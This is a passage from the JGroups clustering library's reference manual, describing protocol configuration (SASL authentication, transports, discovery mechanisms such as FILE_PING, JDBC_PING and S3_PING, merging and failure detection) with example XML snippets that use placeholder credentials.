which contains the initial response required by the chosen SASL mech. This initiates a sequence of
challenge/response messages which, if successful, culminates in allowing the new node to join the cluster.
The actual validation logic required by the SASL mech must be provided by the user in the form of a standard
javax.security.auth.callback.CallbackHandler implementation.

When authentication is successful, the message is simply passed up the stack to the GMS protocol.
When it fails, the SASL protocol creates a JOIN / MERGE RESPONSE message with a failure string and passes
it back down the stack. This failure string informs the client of the reason for failure.
Clients will then fail to join the group and will throw a SecurityException.
If this error string is null then authentication is considered to have passed.

SASL can be (minimally) configured as follows:


[source,xml]
----
<config ... >
    <UDP />
    <PING />
    <pbcast.NAKACK />
    <UNICAST3 />
    <pbcast.STABLE />
    <SASL mech="DIGEST-MD5"
          client_callback_handler="org.example.ClientCallbackHandler"
          server_callback_handler="org.example.ServerCallbackHandler"/>
    <pbcast.GMS />
</config>
----

The +mech+ property specifies the SASL mech you want to use, as defined by RFC-4422. You will also need to provide two
callback handlers, one used when the node is running as coordinator (++$$server_callback_handler$$++) and one used in all other
cases (++$$client_callback_handler$$++). Refer to the JDK's SASL reference guide for more details:
link:$$http://docs.oracle.com/javase/7/docs/technotes/guides/security/sasl/sasl-refguide.html$$[]

The JGroups package comes with a simple properties-based CallbackHandler which can be used when a more complex
Kerberos/LDAP approach is not needed. To use this, set both ++$$server_callback_handler$$++ and
++$$client_callback_handler$$++ to org.jgroups.auth.sasl.SimpleAuthorizingCallbackHandler. This CallbackHandler can
be configured either programmatically, by passing to the constructor an instance of java.util.Properties containing
the appropriate properties, or via standard Java system properties (i.e.
set on the command line using the -DpropertyName=propertyValue notation).
The following properties are available:

* sasl.credentials.properties - the path to a property file which contains principal/credential mappings represented as principal=password
* sasl.local.principal - the name of the principal that is used to identify the local node. It must exist in the sasl.credentials.properties file
* sasl.roles.properties - (optional) the path to a property file which contains principal/roles mappings represented as principal=role1,role2,role3
* sasl.role - (optional) if present, authorizes joining nodes only if their principal has been assigned this role in the roles property file
* sasl.realm - (optional) the name of the realm to use for the SASL mechanisms that require it

${SASL}

[[COMPRESS]]

==== COMPRESS

COMPRESS compresses messages larger than +$$min_size$$+, and uncompresses them at the
receiver's side. Property +$$compression_level$$+ determines how thorough the
compression algorithm should be (0: no compression, 9: highest compression).

${COMPRESS}

[[SCOPE]]

==== SCOPE

As discussed in <<Scopes>>, the SCOPE protocol is used to deliver updates to different scopes
concurrently. It has to be placed somewhere above UNICAST and NAKACK.

SCOPE has a separate thread pool. The reason why the default thread pool from the transport wasn't used
is that the default thread pool has a different purpose. For example, it can use a queue to which all
incoming messages are added, which would defy the purpose of concurrent delivery in SCOPE. As a matter
of fact, using a queue would most likely delay messages being sent up to SCOPE!

Also, the default pool's rejection policy might not be "run", so the SCOPE implementation would have
to catch rejection exceptions and engage in a retry protocol, which is complex and wastes resources.

The configuration of the thread pool is shown below. If you expect _concurrent_ messages to N
_different_ scopes, then the max pool size would ideally be set to N. However, in most cases, this is
not necessary as (a) the messages might not be to different scopes or (b) not all N scopes might get
messages at the same time. So even if the max pool size is a bit smaller, the cost of this is slight
delays, in the sense that a message for scope Y might wait until the thread processing the message for
scope X is available.

To remove unused scopes, an expiry policy is provided: expiration_time is the number of milliseconds
after which an idle scope is removed. An idle scope is a scope which hasn't seen any messages for
expiration_time milliseconds. The expiration_interval value defines the number of milliseconds at
which the expiry task runs. Setting both values to 0 disables expiration; it would then have to be
done manually (see <<Scopes>> for details).

${SCOPE}

[[RELAY]]

==== RELAY

RELAY bridges traffic between separate clusters, see <<RelayAdvanced>> for details.

${RELAY}

[[RELAY2]]

==== RELAY2

RELAY2 provides clustering between different sites (local clusters), for multicast and unicast messages.
See <<Relay2Advanced>> for details.

${RELAY2}

[[STOMP_Protocol]]

==== STOMP

STOMP is discussed in <<STOMP>>. The properties for it are shown below:

${STOMP}

[[DAISYCHAIN]]

==== DAISYCHAIN

The DAISYCHAIN protocol is discussed in <<DaisyChaining>>.

${DAISYCHAIN}

[[RATE_LIMITER]]

==== RATE_LIMITER

RATE_LIMITER can be used to set a limit on the data sent per time unit. When sending data, only
max_bytes can be sent per time_period milliseconds. E.g. if max_bytes="50M" and time_period="1000",
then a sender can send at most 50MB per second.

${RATE_LIMITER}
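The example from the paragraph above would be written as:

[source,xml]
----
<RATE_LIMITER max_bytes="50M" time_period="1000"/>
----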
[[LockingProtocols]]
==== Locking protocols

There are currently 2 locking protocols: org.jgroups.protocols.CENTRAL_LOCK and
org.jgroups.protocols.PEER_LOCK. Both extend Locking, which has the following properties:

${Locking}

[[CENTRAL_LOCK]]

===== CENTRAL_LOCK

With CENTRAL_LOCK, the current coordinator of a cluster grants locks, so every node has to communicate
with the coordinator to acquire or release a lock. Lock requests by different nodes for the same lock
are processed in the order in which they are received.

A coordinator maintains a lock table. To prevent losing the knowledge of who holds which locks, the
coordinator can push lock information to a number of backups defined by num_backups. If num_backups
is 0, no replication of lock information happens. If num_backups is greater than 0, then the coordinator
pushes information about acquired and released locks to all backup nodes. Topology changes might
create new backup nodes, and lock information is pushed to those on becoming a new backup node.

The advantage of CENTRAL_LOCK is that all lock requests are granted in the same order across
the cluster, which is not the case with PEER_LOCK.

${CENTRAL_LOCK}
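For instance, to have the coordinator push its lock table to one backup node (num_backups is described
above; the value is illustrative):

[source,xml]
----
<CENTRAL_LOCK num_backups="1"/>
----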
[[PEER_LOCK]]

===== PEER_LOCK

PEER_LOCK acquires a lock by contacting all cluster nodes, and lock acquisition is only successful
if all non-faulty cluster nodes (peers) grant it.

Unless a total order configuration is used (e.g. org.jgroups.protocols.SEQUENCER based), lock
requests for the same resource from different senders may be received in different order, so
deadlocks can occur. Example:

* Nodes A and B
* A and B call lock(X) at the same time
* A receives L(X,A) followed by L(X,B): locks X(A), queues L(X,B)
* B receives L(X,B) followed by L(X,A): locks X(B), queues L(X,A)

To acquire a lock, we need lock grants from both A and B, but this will never happen here.
To fix this, either add SEQUENCER to the configuration, so that all lock requests are received in
the same global order at both A and B, or use
java.util.concurrent.locks.Lock.tryLock(long,TimeUnit) with retries if a lock cannot be acquired.

${PEER_LOCK}

[[CENTRAL_EXECUTOR]]

==== CENTRAL_EXECUTOR

CENTRAL_EXECUTOR is an implementation of Executing which is needed by the ExecutionService.

${Executing}

${CENTRAL_EXECUTOR}

[[COUNTER]]

==== COUNTER

COUNTER is the implementation of cluster-wide counters, used by the CounterService.

${COUNTER}

[[SUPERVISOR]]

==== SUPERVISOR

SUPERVISOR is a protocol which runs rules which periodically (or event triggered) check conditions and
take corrective action if a condition is not met. Example: org.jgroups.protocols.rules.CheckFDMonitor is
a rule which periodically checks if FD's monitor task is running when the cluster size is > 1. If not,
the monitor task is started.

The SUPERVISOR is explained in more detail in <<Supervisor>>.

${SUPERVISOR}

[[FORK]]

==== FORK

FORK allows ForkChannels to piggyback messages on a regular channel. It needs to be placed towards the
top of the stack. See <<ForkChannel>> for details.

${FORK}

[[protlist]]

== List of Protocols

This chapter describes the most frequently used protocols, and their configuration. _Ergonomics_
(<<Ergonomics>>) strives to reduce the number of properties that have to be configured, by
dynamically adjusting them at run time; however, this is not yet in place.

Meanwhile, we recommend that users copy one of the predefined configurations (shipped with JGroups),
e.g. +udp.xml+ or +tcp.xml+, and make only minimal changes to it.

This section is work in progress; we strive to update the documentation as we make changes to the code.

[[CommonProps]]
=== Properties available in every protocol

The table below lists properties that are available in all protocols, as they're defined in the superclass
of all protocols, org.jgroups.stack.Protocol.

.Properties of org.jgroups.stack.Protocol
[align="left",width="90%",cols="2,10",options="header"]
|===============
|Name|Description
| stats | Whether the protocol should collect protocol-specific runtime statistics. What those
statistics are (or whether they even exist) depends on the particular protocol.
See the `org.jgroups.stack.Protocol` javadoc for the available API related to statistics.
Default is true.

|ergonomics | Turns on ergonomics. See <<Ergonomics>> for details.

|id | Gives the protocol a different ID if needed so we can have multiple instances of it in
the same stack
|===============


[[Transport]]
=== Transport

`TP` is the base class for all transports, e.g. `UDP` and `TCP`. All of the properties
defined here are inherited by the subclasses. The properties for `TP` are:

${TP}

`bind_addr` can be set to the address of a network interface, e.g. +192.168.1.5+.
It can also be set for the entire stack using system property +$$-Djgroups.bind_addr$$+, which
provides a value for bind_addr unless it has already been set in the XML config.

The following special values are also recognized for ++$$bind_addr$$++:

GLOBAL:: Picks a global IP address if available. If not, falls back to a SITE_LOCAL IP address.

SITE_LOCAL:: Picks a site local (non routable) IP address, e.g. from the +192.168.0.0+ or
+10.0.0.0+ address range.

LINK_LOCAL:: Picks a link-local IP address, from +169.254.1.0+ through +169.254.254.255+.

NON_LOOPBACK:: Picks _any_ non loopback address.

LOOPBACK:: Picks a loopback address, e.g. +127.0.0.1+.

match-interface:: Picks an address which matches a pattern against the interface name,
e.g. +match-interface:eth.\*+

match-address:: Picks an address which matches a pattern against the host address,
e.g. +match-address:192.168.\*+

match-host:: Picks an address which matches a pattern against the host name,
e.g. +match-host:linux.\*+

An example of setting the bind address in UDP to use a site local address is:

[source,xml]
----
<UDP bind_addr="SITE_LOCAL" />
----

This will pick any address of any interface that's site-local, e.g. a +192.168.x.x+ or
+10.x.x.x+ address.

[[UDP]]
==== UDP

UDP uses IP multicast for sending messages to all members of a group and UDP datagrams for unicast
messages (sent to a single member).
When started, it opens a unicast and a multicast socket: the unicast socket is used to send/receive
unicast messages, whereas the multicast socket sends and receives multicast messages. The channel's
physical address will be the address and port number of the unicast socket.

A protocol stack with UDP as transport protocol is typically used with clusters whose members run
in the same subnet. If running across subnets, an admin has to ensure that IP multicast is enabled
across subnets. It is often the case that IP multicast is not enabled across subnets. In such cases,
the stack has to either use UDP without IP multicasting or other transports such as TCP.

${UDP}


[[TCP]]
==== TCP

Specifying TCP in your protocol stack tells JGroups to use TCP to send messages between cluster members.
Instead of using a multicast bus, the cluster members create a mesh of TCP connections.

For example, while UDP sends 1 IP multicast packet when sending a message to a cluster of 10 members,
TCP needs to send the message 9 times. It sends the same message to the first member, to the second
member, and so on (excluding itself as the message is looped back internally).

This is slow, as the cost of sending a group message is O(n) with TCP, where it is O(1) with UDP. As the
cost of sending a group message with TCP is a function of the cluster size, it becomes higher with
larger clusters.

NOTE: We recommend using UDP for larger clusters, whenever possible


${BasicTCP}

${TCP}


[[TCP_NIO2]]
==== TCP_NIO2

TCP_NIO2 is similar to <<TCP>>, but uses NIO (= Non blocking IO) to send messages to and receive messages
from members. Contrary to TCP, it doesn't use 1 thread per connection, but handles accepts, connects, reads and
writes in a *single thread*.

All of these operations are guaranteed to never block.

For example, if a read is supposed to receive 1000 bytes and only received 700, the read saves the 700
bytes somewhere and later - when the remaining 300 bytes have been received - is notified to complete
the read and then returns the 1000 bytes to the application.

Using a single thread is not a problem, as operations will never block. The only potentially blocking operation,
namely delivering messages up to the application, is done via the regular or OOB thread pools, as usual.

While <<TCP>> and <<TCP_NIO2>> both have the N-1 problem of sending cluster wide messages (contrary to <<UDP>>),
TCP_NIO2 is able to handle a larger number of connections than TCP, as it doesn't use the thread-per-connection model,
and - contrary to TCP, but similar to UDP - it doesn't block when sending or receiving messages.

${BasicTCP}

${TCP_NIO2}


[[TUNNEL]]

==== TUNNEL
TUNNEL is described in <<TUNNEL_Advanced>>.

${TUNNEL}


[[DiscoveryProtocols]]
=== Initial membership discovery

The task of the discovery is to find an initial membership, which is used to determine the current
coordinator. Once a coordinator is found, the joiner sends a JOIN request to the coordinator.

Discovery is also called periodically by `MERGE2` (see <<MERGE2>>), to see if we have
diverging cluster membership information.

[[Discovery]]
==== Discovery

`Discovery` is the superclass for all discovery protocols and therefore its
properties below can be used in any subclass.

Discovery sends a discovery request, and waits for +$$num_initial_members$$+ discovery
responses, or +timeout+ ms, whichever occurs first, before returning. Note that
+$$break_on_coord_rsp="true"$$+ will return as soon as we have a response from a coordinator.
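As a sketch with illustrative values, a PING section that waits for at most 3 responses or 2000 ms,
whichever comes first, would be:

[source,xml]
----
<PING timeout="2000" num_initial_members="3"/>
----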
${Discovery}

[[DiscoveryAndCaches]]
===== Discovery and local caches

Besides finding the current coordinator in order to send a JOIN request to it, discovery also
fetches information about members and adds it to its local caches. This information includes
the logical name, UUID and IP address/port of each member. When discovery responses are received,
the information in them will be added to the local caches.

Since 3.5 it is possible to define this information in a single file, with each line providing
information about one member. The file contents look like this:


----
m1.1 1 10.240.78.26:7800 T
m2.1 2 10.240.122.252:7800 F
m3.1 3 10.240.199.15:7800 F
----

This file defines information about 3 members m1.1, m2.1 and m3.1. The first element ("m1.1") is the
logical name. Next comes the UUID (1), followed by the IP address and port (`10.240.78.26:7800`).
T means that the member is the current coordinator.

Method `dumpCache()` can be used to write the current contents of any member to a file (in the above
format) and `addToCache()` can be used to add the contents of a file to any member. These operations
can for example be invoked via JMX or probe.sh.

Refer to the section on `FILE_PING` for more information on how to use these files to speed up
the discovery process.

[[PING]]
==== PING

Initial (dirty) discovery of members. Used to detect the coordinator (oldest member), by
mcasting PING requests to an IP multicast address.

Each member responds with a packet {C, A}, where C=coordinator's address and A=own address. After N
milliseconds or M replies, the joiner determines the coordinator from the responses, and sends a
JOIN request to it (handled by GMS). If nobody responds, we assume we are the first member of a group.

Unlike TCPPING, PING employs dynamic discovery, meaning that the member does not have to know in advance
where other cluster members are.

PING uses the IP multicasting capabilities of the transport to send a discovery
request to the cluster. It therefore requires UDP as transport.

${PING}


[[TCPPING_Prot]]
==== TCPPING

TCPPING is used with TCP as transport, and uses a static list of cluster members' addresses. See
<<TCPPING>> for details.

${TCPPING}

NOTE: It is recommended to include the addresses of _all_ cluster members in `initial_hosts`.
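A typical sketch (host names and ports are made up) listing all cluster members explicitly:

[source,xml]
----
<TCPPING timeout="3000" num_initial_members="3"
         initial_hosts="hostA[7800],hostB[7800],hostC[7800]"
         port_range="1"/>
----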
[[TCPGOSSIP_Prot]]
==== TCPGOSSIP

TCPGOSSIP uses an external GossipRouter to discover the members of a cluster. See <<TCPGOSSIP>>
for details.

${TCPGOSSIP}

[[MPING]]
==== MPING

MPING (=Multicast PING) uses IP multicast to discover the initial membership. It can be used with all
transports, but usually is used in combination with TCP. TCP usually requires TCPPING, which has to list
all cluster members explicitly, but MPING doesn't have this requirement. The typical use case for this
is when we want TCP as transport, but multicasting for discovery, so we don't have to define a static
list of initial hosts in TCPPING.

MPING uses its own multicast socket for discovery. Properties +$$bind_addr$$+ (can also
be set via ++$$-Djgroups.bind_addr=$$++), +$$mcast_addr$$+ and
+$$mcast_port$$+ can be used to configure it.

Note that MPING requires a separate thread listening on the multicast socket for discovery requests.

${MPING}

[[FILE_PING]]
==== FILE_PING

FILE_PING can be used instead of GossipRouter in cases where no external process is desired.

Since 3.5, the way FILE_PING performs discovery has changed. The following paragraphs describe the new
mechanism to discover members via FILE_PING or subclasses (e.g. S3_PING or GOOGLE_PING),
so this applies to all cloud-based stores as well.

Instead of storing 1 file per member in the file system or cloud store, we only store 1 file for
_all_ members. This has the advantage, especially in cloud stores, that the number
of reads is not a function of the cluster size; e.g. we don't have to perform 1000 reads for member
discovery in a 1000 node cluster, but just a single read. This is important as the cost of
1000 times the round trip time of a (REST) call to the cloud store is certainly higher than the cost
of a single call. There may also be a charge for calls to the cloud, so a reduced number of calls leads
to reduced charges for cloud store access, especially in large clusters.

The current coordinator is always in charge of writing the file; participants never write it, but only
read it. When there is a split and we have multiple coordinators, we may also have multiple files.

The name of a file is always UUID.logical_name.list, e.g. `0000-0000-000000000001.m1.1.list`, which has
a UUID of 1, a logical name of "m1.1" and the suffix ".list".

[[BootstrapConfiguration]]
===== Configuration with a preconfigured bootstrap file

To speed up the discovery process when starting a large cluster, a predefined bootstrap file
can be used. Every node then needs to have an entry in the file, and its UUID and IP address:port
need to be the same as in the file. For example, when using the following bootstrap file:


----
m1.1 1 10.240.78.26:7800 T
m2.1 2 10.240.122.252:7800 F
m3.1 3 10.240.199.15:7800 F
----

the member called "m1.1" needs to have a UUID of 1, and needs to run on host 10.240.78.26 on
port 7800. The UUID can be injected via an AddressGenerator (see UPerf for an example).

When a member starts, it loads the bootstrap file, which contains information about all other members,
and thus (ideally) never needs to run a discovery process. In the above example, the new joiner also
knows that the current coordinator (marked with a 'T') is m1.1, so it can send its JOIN request to
that node.

When the coordinator changes, or members not listed in the file join, the current coordinator
writes the file again, so all members have access to the updated information when needed.

If a bootstrap discovery file is to be used, it needs to be placed into the file system or cloud
store in the correct location and with the right name (see the Discovery section for naming details).

The design is discussed in more detail in
link:$$https://github.com/belaban/JGroups/blob/master/doc/design/CloudBasedDiscovery.txt$$[CloudBasedDiscovery.txt]


===== Removal of zombie files

By default, a new coordinator C never removes a file created by an old coordinator `A`. E.g.
in `{A,B,C,D}` (with\ncoordinator `A`), if `C` becomes coordinator on a split `{A,B} | {C,D}`, then `C` doesn't remove `A`'s file, as there\nis no way for `C` to know whether `A` crashed or whether `A` was partitioned away.\n\nEvery coordinator `P` installs a shutdown hook which removes `P`'s file on termination. However, this doesn't apply\nto a process killed ungracefully, e.g. by `kill -9`. In this case, no shutdown hook will get called. If we had view\n`{A,B,C}`, and `A` was killed via kill -9, and `B` takes over, we'd have files `A.list` and `B.list`.\n\nTo change this, attribute `remove_old_coords_on_view_change` can be set to true. In this case, files created by old\ncoordinators will be removed. In the scenario above, where `A` crashed, `B` would remove `A.list`.\n\nHowever, if we have a split between `{A,B}` and `{C,D}`, `C` would remove `A.list`. To prevent this, every coordinator\nwrites its file again on a view change that has left members or in which the coordinator changed.\n\nThere is still a case which can end up with a zombie file that's never removed: when we have a single member `A` and\nit is killed via `kill -9`. In this case, file `A.list` will never get cleaned up and subsequent joiners will ask\n`A` to join, up to `GMS.max_join_attempts` times.\n\nZombie cleanup can be solved by setting `remove_all_files_on_view_change` to true. In this case, a coordinator\nremoves _all files_ on a view change that has members leaving or changes the coordinator.\n\nNOTE: Setting `remove_old_coords_on_view_change` or `remove_all_files_on_view_change` to true generates more traffic\nto the file system or cloud store. If members are always shut down gracefully, or never killed via `kill -9`, then\nit is recommended to set both attributes to false.\n\n\n${FILE_PING}\n\n\n\n==== JDBC_PING\n\nJDBC_PING uses a DB to store information about cluster nodes used for discovery. All cluster nodes are supposed to be\nable to access the same DB.\n\nWhen a node starts, it queries information about existing members from the database, determines the coordinator and\nthen asks the coord to join the cluster. It also inserts information about itself into the table, so others can\nsubsequently find it.\n\nWhen a node P has crashed, the current coordinator removes P's information from the DB. However, if there is a network\nsplit, then this can be problematic, as crashed members cannot be told from partitioned-away members.\n\nFor instance, if we have `{A,B,C,D}`, and the split creates 2 subclusters `{A,B}` and `{C,D}`,\nthen `A` would remove `{C,D}` because it thinks they crashed, and - likewise - `C` would remove `{A,B}`.\n\nTo solve this, every member re-inserts its information into the DB after a _view change_. So when `C` and `D`'s view\nchanges from `{A,B,C,D}` to `{C,D}`, both sides of the split re-insert their information.\nDitto for the other side of the network split.\n\nThe re-insertion is governed by attributes `info_writer_max_writes_after_view` and `info_writer_sleep_time`: the former\ndefines the number of times re-insertion should be done (in a timer task) after each view change and the latter is the\nsleep time (in ms) between re-insertions.\n\nThe value of this is that dead members are removed from the DB (because they cannot do re-insertion), but network splits\nare handled, too.\n\nAnother attribute `clear_table_on_view_change` governs how zombies are handled. Zombies are table entries for members\nwhich crashed, but weren't removed for some reason. E.g. 
if we have a single member `A` and kill it (via kill -9), then it won't get removed from the table.

If `clear_table_on_view_change` is set to true, then the coordinator _clears_ the table after a view change (instead of
only removing the crashed members), and everybody re-inserts their own information. This attribute can be set to true if
automatic removal of zombies is desired. However, it is costly; therefore, if no zombies ever occur (e.g. because
processes are never killed with kill -9), or zombies are removed by a system admin, then it should be set to false.

NOTE: Processes killed with kill -3 are removed from the DB, as a shutdown handler will be called on kill -3
(but not on kill -9).

${JDBC_PING}
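A minimal sketch (the connection parameters are made up and would be replaced with those of the shared DB):

[source,xml]
----
<JDBC_PING connection_url="jdbc:mysql://dbhost/jgroups"
           connection_username="jgroups"
           connection_password="secret"
           connection_driver="com.mysql.jdbc.Driver"/>
----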
==== BPING

BPING uses UDP broadcasts to discover other nodes. The default broadcast address (dest) is
255.255.255.255, and should be replaced with a subnet specific broadcast, e.g. 192.168.1.255.

${BPING}


==== RACKSPACE_PING

RACKSPACE_PING uses Rackspace Cloud Files Storage to discover initial members. Each node writes a small
object in a shared Rackspace container. New joiners read all addresses from the container and ping each
of the elements of the resulting set of members. When a member leaves, it deletes its corresponding object.

These objects are stored under a container called 'jgroups', and each node will write an object named after
the cluster name, plus a "/" followed by the address, thus simulating a hierarchical structure.

${RACKSPACE_PING}


==== S3_PING

S3_PING uses Amazon S3 to discover initial members. New joiners read all addresses
from this bucket and ping each of the elements of the resulting set of members. When a member leaves, it
deletes its corresponding file.

It's designed specifically for members running on Amazon EC2, where multicast traffic is not allowed and
thus MPING or PING will not work. When Amazon RDS is preferred over S3, or if a shared database is used,
an alternative is to use JDBC_PING.

Each instance uploads a small file to an S3 bucket and each instance reads the files out of this bucket
to determine the other members.

There are three different ways to use S3_PING, each having its own tradeoffs between security and
ease-of-use. These are described in more detail below:

* Private buckets, Amazon AWS credentials given to each instance
* Public readable and writable buckets, no credentials given to each instance
* Public readable but private writable buckets, pre-signed URLs given to each instance

Pre-signed URLs are the most secure method since writing to buckets still requires authorization and
you don't have to pass Amazon AWS credentials to every instance. However, they are also the most complex
to set up.

Here's a configuration example for private buckets with credentials given to each instance:


[source,xml]
----
<S3_PING location="my_bucket" access_key="access_key"
         secret_access_key="secret_access_key" timeout="2000"
         num_initial_members="3"/>
----

Here's an example for public buckets with no credentials:


[source,xml]
----
<S3_PING location="my_bucket"
         timeout="2000" num_initial_members="3"/>
----

And finally, here's an example for public readable buckets with pre-signed URLs:


[source,xml]
----
<S3_PING pre_signed_put_url="http://s3.amazonaws.com/my_bucket/DemoCluster/node1?AWSAccessKeyId=access_key&Expires=1316276200&Signature=it1cUUtgCT9ZJyCJDj2xTAcRTFg%3D"
         pre_signed_delete_url="http://s3.amazonaws.com/my_bucket/DemoCluster/node1?AWSAccessKeyId=access_key&Expires=1316276200&Signature=u4IFPRq%2FL6%2FAohykIW4QrKjR23g%3D"
         timeout="2000" num_initial_members="3"/>
----

${S3_PING}


==== AWS_PING

This is a protocol written by Meltmedia, which uses the AWS API. It is not part of JGroups, but can be
downloaded at link:$$http://meltmedia.github.io/jgroups-aws/$$[].


==== Native S3 PING

This implementation by Zalando uses the AWS SDK. It is not part of JGroups, but can be found at
link:$$https://github.com/zalando/jgroups-native-s3-ping/$$[].


==== GOOGLE_PING

GOOGLE_PING is a subclass of S3_PING and inherits most of the functionality. It uses Google Cloud
Storage to store information about individual members.

The snippet below shows a sample config:


[source,xml]
----
<GOOGLE_PING
    location="jgroups-bucket"
    access_key="GXXXXXX"
    secret_access_key="YYYYYY"
    timeout="2000" num_initial_members="3"/>
----

This will use a bucket "jgroups-bucket" or create one if it doesn't exist, then create another folder
under it with the cluster name, and finally use 1 object per member in that location for member info.

${GOOGLE_PING}


==== SWIFT_PING

SWIFT_PING uses Openstack Swift to discover initial members. Each node writes a small
object in a shared container. New joiners read all addresses from the container and ping each
of the elements of the resulting set of members. When a member leaves, it deletes its corresponding object.

These objects are stored under a container called 'jgroups' (by default), and each node will write an object
named after the cluster name, plus a "/" followed by the address, thus simulating a hierarchical structure.

Currently only Openstack Keystone authentication is supported. Here is a sample configuration block:


[source,xml]
----
<SWIFT_PING timeout="2000"
            num_initial_members="3"
            auth_type="keystone_v_2_0"
            auth_url="http://localhost:5000/v2.0/tokens"
            username="demo"
            password="password"
            tenant="demo" />
----

${SWIFT_PING}


==== PDC - Persistent Discovery Cache

The Persistent Discovery Cache can be used to cache the results of the discovery process persistently.
E.g.
if we have TCPPING.initial_hosts configured to include only members A and B, but have a lot more
members, then other members can bootstrap themselves and find the right coordinator even when neither
A nor B are running.

An example of a TCP-based stack configuration is:


[source,xml]
----
<TCP />
<PDC cache_dir="/tmp/jgroups" />
<TCPPING timeout="2000" num_initial_members="20"
         initial_hosts="192.168.1.5[7000]" port_range="0"
         return_entire_cache="true"
         use_disk_cache="true" />
----

${PDC}


=== Merging after a network partition

[[MERGE2]]
==== MERGE2

If a cluster gets split for some reason (e.g. a network partition), this protocol merges the subclusters
back into one cluster. It is only run by the coordinator (the oldest member in a cluster), which
periodically multicasts its presence and view information. If another coordinator (for the same cluster)
receives this message, it will initiate a merge process. Note that this merges subgroups
+{A,B}+ and +{C,D,E}+ back into +{A,B,C,D,E}+,
but it does _not merge state_. The application has to handle the callback to merge
state. See <<HandlingNetworkPartitions>> for suggestions on merging state.

Following a merge, the coordinator of the merged group can differ from the typical case of
"the coordinator is the member who has been up the longest". During the merge process, the coordinators
of the various subgroups need to reach a common decision as to who the new coordinator is.
In order to ensure a consistent result, each coordinator combines the addresses of all the members
in a list and then sorts the list. The first member in the sorted list becomes the coordinator.
The sort order is determined by how the address implements the Comparable interface; JGroups compares
addresses based on their UUIDs. So, take a hypothetical case where two machines were running, with one
machine running three separate cluster members and the other running two. If communication between the
machines were cut, the following subgroups would form:
+{A,B} and {C,D,E}+.
Following the merge, the new view would be +{C,D,A,B,E}+, with C being the new coordinator.

Note that "A", "B" and so on are just logical names, attached to UUIDs, but the actual sorting is done
on the actual UUIDs.

${MERGE2}

NOTE: `MERGE2` is deprecated and will be removed in 4.0. Users of it should switch to `MERGE3`.


[[MERGE3]]
==== MERGE3

If a cluster gets split for some reason (e.g. a network partition), this protocol merges the subclusters
back into one cluster.

All members periodically send an INFO message with their address (UUID), logical name,
physical address and ViewId. The ViewId (<<ViewId>>) is used to see if we have diverging
views among the cluster members: periodically, every coordinator looks at the INFO messages received so
far and checks if there are any inconsistencies.

If inconsistencies are found, the _merge leader_ will be the member with the lowest address (UUID).

The merge leader then asks the senders of the inconsistent ViewIds for their full views. Once received,
it simply passes a `MERGE` event up the stack, where the merge will be handled (by `GMS`) in exactly the same
way as if `MERGE2` had generated the `MERGE` event.

The advantages of `MERGE3` compared to `MERGE2` are:

* Sending of INFO messages is spread out over time, preventing message peaks which might cause packet loss.
This is especially important in large clusters.\n* Only 1 merge should be running at any time. Competing merges, as happening with `MERGE2`, slow\n down the merge process, and don't scale to large clusters.\n* An INFO message carries the logical name and physical address of a member. Compared to `MERGE2`,\n this allows us to immediately send messages to newly merged members, and not have to solicit\n this information first.\n* On the downside, `MERGE3` has constant (small) traffic by all members.\n* `MERGE3` was written for an IP multicast capable transport (`UDP`), but it also works with other\n transports (such as `TCP`), although it isn't as efficient on `TCP` as on `UDP`.\n\n\n===== Example\n\n[source,xml]\n----\n<MERGE3 max_interval=\"10000\" min_interval=\"5000\" check_interval=\"15000\"\/>\n----\n\nThis means that every member sends out an INFO message at a random interval in range [5000 .. 10000] ms. Every\n15 seconds (`check_interval`), every coordinator checks if it received a ViewId differing from its own, and initiates\na merge if true.\n\n* We have subclusters `{A,B,C}`, `{D,E}` and `{F}`. The subcluster coordinators are `A`, `D` and `F`\n* The network partition now heals\n* `D` checks its received ViewIds, and sees entries from itself and `A`\n** Since broadcasting of INFO messages is unreliable (as `MERGE3` is underneath `NAKACK2` in the stack), the last\n INFO message from `F` might have been dropped\n* `D` or `A` initiates a merge, which results in view `{A,B,C,D,E}`\n* A bit later, on the next check, `F` sees that its ViewId diverges from the ViewId sent in an INFO message by `C`\n* `F` and `A` initiate a new merge which results in merge view `{A,B,C,D,E,F}`\n\nIncreasing `check_interval` decreases the chance of partial merges (as shown above), but doesn't entirely eliminate them:\nmembers are not started at exactly the same time, and therefore their check intervals overlap.\nIf a member's interval elapsed just after receiving INFO messages from a subset of the subclusters\n(e.g. briefly after a partition healed), then we will still have a partial merge.\n\n${MERGE3}\n\n\n\n\n\n\n[[FailureDetection]]\n=== Failure Detection\n\nThe task of failure detection is to probe members of a group and see whether they are alive. When a member is\nsuspected of having failed, then a SUSPECT message is sent to all nodes of the cluster. It is not the task of the\nfailure detection layer to exclude a crashed member (this is done by the group membership protocol, GMS), but\nsimply to notify everyone that a node in the cluster is suspected of having crashed.\n\nThe SUSPECT message is handled by the GMS protocol of the current coordinator only; all other members ignore it.\n \n\n[[FD]]\n==== FD\n\nFailure detection based on a logical ring and heartbeat messages.\n\nMembers form a logical ring; e.g. in view `{A,B,C,D}`, `A` pings `B`, which pings `C`, which pings `D`, which pings `A`.\n'Pinging' means sending a heartbeat.\n\nEach member sends this heartbeat every `timeout` ms to the neighbor to its right. When a member receives a heartbeat, it\nsends back an ack. 
When the ack is received, the timestamp of when a member last heard from its neighbor is reset.

When a member doesn't receive any heartbeat acks from its neighbor for `timeout` * `max_tries` ms,
that member is declared suspected, and will be excluded by GMS.

This is done by `FD` multicasting a `SUSPECT(P)` message, which is handled by the current coordinator by double-checking
the health of `P` (using `VERIFY_SUSPECT`) and - if `P` still doesn't reply - by excluding `P` from the membership.

Note that setting `msg_counts_as_heartbeat` to true causes a regular message from `P` to reset `P`'s
timestamp in the pinging member.

===== Example

[source,xml]
----
<FD timeout="3000" max_tries="4" />
----
* The membership is `{A,B,C,D,E}`.
* Now C and D crash at the same time
* B's next heartbeats won't get an ack
* After roughly 12 seconds (4 * 3 secs), B suspects C
** B now starts sending heartbeats to D
* A (the coordinator) handles the `SUSPECT(C)` message from B and uses `VERIFY_SUSPECT` to double-check that C is really dead
* After `VERIFY_SUSPECT.timeout` ms, A creates a new view `{A,B,D,E}` excluding C
* After ca. 12 seconds, B sends a `SUSPECT(D)` message to the coordinator, which eventually also excludes `D`


${FD}


[[FD_ALL]]
==== FD_ALL

Failure detection based on a simple heartbeat protocol. Every member periodically multicasts a heartbeat.
Every member also maintains a table of all members (minus itself). When data or a heartbeat from P is
received, we reset the timestamp for P to the current time.
Periodically, we check for expired members whose timestamp is older than the timeout, and suspect those.

===== Example

[source,xml]
----
<FD_ALL timeout="12000" interval="3000" timeout_check_interval="2000"/>
----
* The membership is `{A,B,C,D,E}`.
